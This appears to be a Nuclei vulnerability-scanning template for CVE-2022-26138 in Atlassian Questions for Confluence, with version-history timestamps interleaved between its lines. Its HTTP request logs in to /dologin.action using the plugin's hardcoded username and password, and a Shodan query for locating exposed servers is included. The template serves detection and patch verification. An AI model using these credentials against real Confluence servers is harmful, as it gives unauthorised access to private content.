2022-07-21 15:23:23 +00:00
id : CVE-2022-26138
info :
2023-01-16 17:41:15 +00:00
name : Atlassian Questions For Confluence - Hardcoded Credentials
2022-07-21 15:23:23 +00:00
author : HTTPVoid
severity : critical
description : |
2023-01-16 17:41:15 +00:00
Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group.
2022-07-21 15:23:23 +00:00
reference :
- https://twitter.com/fluepke/status/1549892089181257729
- https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html
2022-07-21 15:35:47 +00:00
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
2023-01-16 17:41:15 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-26138
2023-07-11 19:49:27 +00:00
- https://jira.atlassian.com/browse/CONFSERVER-79483
2022-07-21 15:23:23 +00:00
classification :
2022-08-27 04:41:18 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-07-21 15:23:23 +00:00
cve-id : CVE-2022-26138
2022-08-27 04:41:18 +00:00
cwe-id : CWE-798
2023-07-11 19:49:27 +00:00
epss-score : 0.97313
cpe : cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:*
2022-07-21 15:35:47 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-07-21 15:35:47 +00:00
shodan-query : http.component:"Atlassian Confluence"
2023-07-11 19:49:27 +00:00
vendor : atlassian
product : questions_for_confluence
2022-07-29 15:56:00 +00:00
tags : cve,cve2022,confluence,atlassian,default-login,kev
2022-07-21 15:23:23 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-21 15:23:23 +00:00
- raw :
- |
POST /dologin.action HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
os_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action
payloads :
os_username :
- disabledsystemuser
os_password :
- disabled1system1user6708
2023-07-11 19:49:27 +00:00
attack : pitchfork
2022-07-21 15:23:23 +00:00
matchers :
- type : dsl
dsl :
2023-01-16 17:41:15 +00:00
- 'location == "/httpvoid.action"'